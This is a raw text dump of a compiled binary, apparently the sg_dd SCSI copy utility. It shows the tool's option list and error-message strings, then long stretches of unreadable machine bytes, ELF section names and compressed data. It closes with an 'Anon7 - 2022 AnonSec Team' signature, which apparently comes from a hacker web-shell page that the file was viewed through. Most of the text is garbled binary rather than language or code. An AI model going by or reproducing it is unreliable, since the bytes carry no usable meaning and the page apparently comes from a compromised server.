              [obs=BS] [of=OFILE] [oflag=FLAGS] [seek=SEEK] [skip=SKIP]
              [--help] [--version]

              [blk_sgio=0|1] [bpt=BPT] [cdbsz=6|10|12|16] [coe=0|1|2|3]
              [coe_limit=CL] [dio=0|1] [odir=0|1] [of2=OFILE2] [retries=RETR]
              [sync=0|1] [time=0|1] [verbose=VERB]
  where:
    blk_sgio    0->block device use normal I/O(def), 1->use SG_IO
    bpt         is blocks_per_transfer (default is 128 or 32 when BS>=2048)
    bs          block size (default is 512)
    cdbsz       size of SCSI READ or WRITE cdb (default is 10)
    coe         0->exit on error (def), 1->continue on sg error (zero
                fill), 2->also try read_long on unrecovered reads,
                3->and set the CORRCT bit on the read long
    coe_limit   limit consecutive 'bad' blocks on reads to CL times
                when COE>1 (default: 0 which is no limit)
    count       number of blocks to copy (def: device size)
    dio         for direct IO, 1->attempt, 0->indirect IO (def)
    ibs         input block size (if given must be same as 'bs=')
    if          file or device to read from (def: stdin)
    iflag       comma separated list from: [coe,dio,direct,dpo,dsync,excl,
                flock,fua,nocache,null,sgio]
    obs         output block size (if given must be same as 'bs=')
    odir        1->use O_DIRECT when opening block dev, 0->don't(def)
    of          file or device to write to (def: stdout), OFILE of '.'
                treated as /dev/null
    of2         additional output file (def: /dev/null), OFILE2 should be
                normal file or pipe
    oflag       comma separated list from: [append,coe,dio,direct,dpo,
                dsync,excl,flock,fua,nocache,null,sgio,sparse]
    retries     retry sgio errors RETR times (def: 0)
    seek        block position to start writing to OFILE
    skip        block position to start reading from IFILE
    sync        0->no sync(def), 1->SYNCHRONIZE CACHE on OFILE after copy
    time        0->no timing(def), 1->time plus calculate throughput
    verbose     0->quiet(def), 1->some noise, 2->more noise, etc
    --help      print out this usage message then exit
    --version   print version information then exit

copy from IFILE to OFILE, similar to dd command; specialized for SCSI devices
Assume default 'bs' (block size) of %d bytes
If 'ibs' or 'obs' given must be same as 'bs'
skip and seek cannot be negative
Can't use both append and seek switches
sparse flag ignored for iflag
sg_dd: unable to use scsi tape device %s
sg_dd: could not open %s for sg reading        open input(sg_io), flags=0x%x
    %s: %.8s  %.16s  %.4s  [pdt=%d]
sg_dd: SG_SET_RESERVED_SIZE errorsg_dd: sg driver prior to 3.x.y
sg_dd: could not open %s for reading        open input, flags=0x%x
sg_dd: couldn't skip to required position on %s  >> skip: lseek64 SEEK_SET, byte offset=0x%lx
open_if: posix_fadvise(SEQUENTIAL), err=%d
sg_dd: flock(LOCK_EX | LOCK_NB) on %s failedsg_dd: could not open %s for sg writing        open output(sg_io), flags=0x%x
sg_dd: could not open %s for writingsg_dd: could not open %s for raw writing        %s output, flags=0x%x
sg_dd: couldn't seek to required position on %s   >> seek: lseek64 SEEK_SET, byte offset=0x%lx
Can't have both 'if' as stdin _and_ 'of' as stdout
oflag=sparse needs seekable output file
Unit attention (readcap in), continuing
Aborted command (readcap in), continuing
read capacity not supported on %s
read capacity failed on %s - not ready
Unable to read capacity on %s
>> warning: block size on %s confusion: bs=%d, device claims=%d
Unable to read block capacity on %s
block size on %s confusion: bs=%d, device claims=%d
Unit attention (readcap out), continuing
Aborted command (readcap out), continuing
Couldn't calculate count, please give one
Note: SCSI command size increased to 16 bytes (for 'if')
Note: SCSI command size increased to 16 bytes (for 'of')
posix_memalign: error [%d] out of memory?
Reducing read to %d blocks per loop
sg_read failed,%s at or after lba=%ld [0x%lx]
write to of2: count=%d, res=%d
sg_dd: writing to of2, seek=%ld sparse bypassing sg_write: seek blk=%ld, offset blks=%d
sparse bypassing write: seek=%ld, rel offset=%ld
sparse tried to bypass write: seek=%ld, rel offset=%ld but ...
oflag=sparse lseek64 result=%ld
sg_dd: bad wr cdb build, to_block=%ld, blocks=%d
writing (SG_IO) on sg device, error    lba of last recovered error in this WRITE=0x%lx
Recovered error: [no info] writing to block=0x%lx, num=%d
>> ignored errors for out blk=%ld for %d bytes
Reducing write to %d blocks per loop
Unit attention, continuing (w)
Aborted command, continuing (w)
Aborted command, too many (w)
>>> retrying a sgio write, lba=0x%lx
write(unix): count=%d, res=%d
output file probably full, seek=%ld posix_fadvise on read, skip=%ld ,err=%d
posix_fadvise on of2, seek=%ld ,err=%d
posix_fadvise on output, seek=%ld ,err=%d
write(unix, sparse after error): count=%d, res=%d
sg_dd: writing(sparse after error), seek=%ld Unit attention (out, sync cache), continuing
>> Direct IO requested but incomplete %d times
>>> %s set to '0' but should be set to '1' for direct IO
>> Non-zero sum of residual counts=%d
sg_dd: bad argument to 'conv='
X@jX@.Y@�X@jX@]X@<X@jX@jX@jX@jX@<X@jX@jX@jX@jX@jX@jX@jX@jX@jX@�W@�[@]@�[@H[@P\@�]@0^@0^@x\@0^@0^@0^@0^@�\@0^@0^@0^@0^@0^@0^@�[@`@H[@8^@�`@�_@�_@�`@�`@h`@�`@�`@�`@�`@@`@�`@�`@�`@�`@�`@�`@�_@�`@�b@/a@�b@�b@�a@�a@�b@�b@~a@�b@aa@�b@�b@�b@�b@�b@�a@�&@�&@U&@�&@�&@�&@�%@�&@�&@�&@�&@�%@�&@�&@�&@�&@�&@�&@�&@�&@�&@%@���ư>�h㈵��>�@��.A;���������������������� ���@P���X������0����X0�������������� ���p����0��`����zRx���*zRx�$����`FJw�?;*3$",D����yA�F�I�a
AAAtض��"$���H��
Ek
]|�h����B�E�E �H(�F0�D8�G@�
8A0A(B BBBCS
8C0A(B BBBA�
8F0A(B BBBJ,4�����B�I�C �G0� AAB$dx����A�J��
AAD� ����B�Q�E �D(�A0�Fp�
0A(A BBBA<�����nB�B�A �A(�D`
(A ABBG����ADx$,��A�I��
AALTx����B�G�B �B(�A0�F8�M��
8A0A(B BBBFL���DB�E�E �E(�A0�C8�G�
8A0A(B BBBAL���V	B�B�B �B(�D0�A8�G��
8A0A(B BBBKLD�����.B�B�B �B(�A0�A8�G�'
8A0A(B BBBAD����eB�E�E �E(�H0�H8�M@l8A0A(B BBB����0E@E@8@
dd@�`�`���o�@x@�@
��`�@@@0	���o�@���o�o8@�`v@�@�@�@�@�@�@�@�@@@&@6@F@V@f@v@�@�@�@�@�@�@�@�@@@&@6@F@V@f@v@�@�@�@�@�@�@�@�@@@&@6@F@V@f@v@�@�@�@�@
��������sg_dd.debug)z��7zXZ�ִF!t/���]?�E�h=��ڊ̓�N���%Ji���,P���3\����׫#�+\b�NS�Ĉ]�)Հ���ϩ����ۄ(b��U�;*hR9���r��c9��O�h����<݀��m�z{��9��(��0�������^.\�Tә�2BNw�xL��JJ�5\
�;|-Pr�����h���LM�f�kjDbI\���z�4P���v�1��Q7�t�q���0cSx+:-a}���C��Q׀�a��z��C2g�27"�QU��z�GV��zAhV��FQ���d��[u��o��J��C0�`��0,�\s �iJ�X.|�2���B�Sk4�|/�@i*PI�=Vs�6�`�I1�]�z���cbƆ���\u��Z���,Y�x�����g7���}u������%���ϭl�k1>�
���"�y��0�P�Z���r2K�j����l���(��K��~5�=T��U(]��٘�3�qm� F�z��'�+e�w%E�T(v6�v�Z}:%~"�#����0k~�g�
����U�`�������4
��*�_[MXrjt
�ۂ�3w�!@#5���Fxd�J�����F?"���'�M�7�<ϙcd��TAֻ���0�8-�����]�t�d�l�Q����Q;�@��J���J��:Kf��u�mDV��LFf���|L#���t���(@ߟF����%
�oʀ��IY��P?��껯�V�Ȱw)u�C��>U�3���aC�7�1 �6�^�Y��|�wJΙ�o�zA��T��n��Ԗ-�,����왋�,*�k�i9�#����Ÿ{�4Y��\q��1��Bfyt���<�z�a��_�4N.�!�	@�|��|C���9ࣈ�H�2Y�øt�T�1S2�|��3�U���nt<y�tw��ks��9nGH�9ϊ�
<JW���\Ǹ���µhu�n�x�"|���Q�LM�Ws�����i烫���T�2uR�*�>JX�w`�#Ǭ�l�1�&�d������5GT��!5j>��g�YZ.shstrtab.interp.note.ABI-tag.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.jcr.dynamic.got.got.plt.data.bss.gnu_debuglink.gnu_debugdata8@8T@T !t@t$4���o�@�<>�@��Fx@x�N���o8@8x[���o�@�`j@0tB@@@�~8@8y`@``��@��O�dd@dd	�pd@pdP)���@����`�@`�$��`���`���`���`�����`����`�����`�� ��`�H ����H8�


Anon7 - 2022
AnonSec Team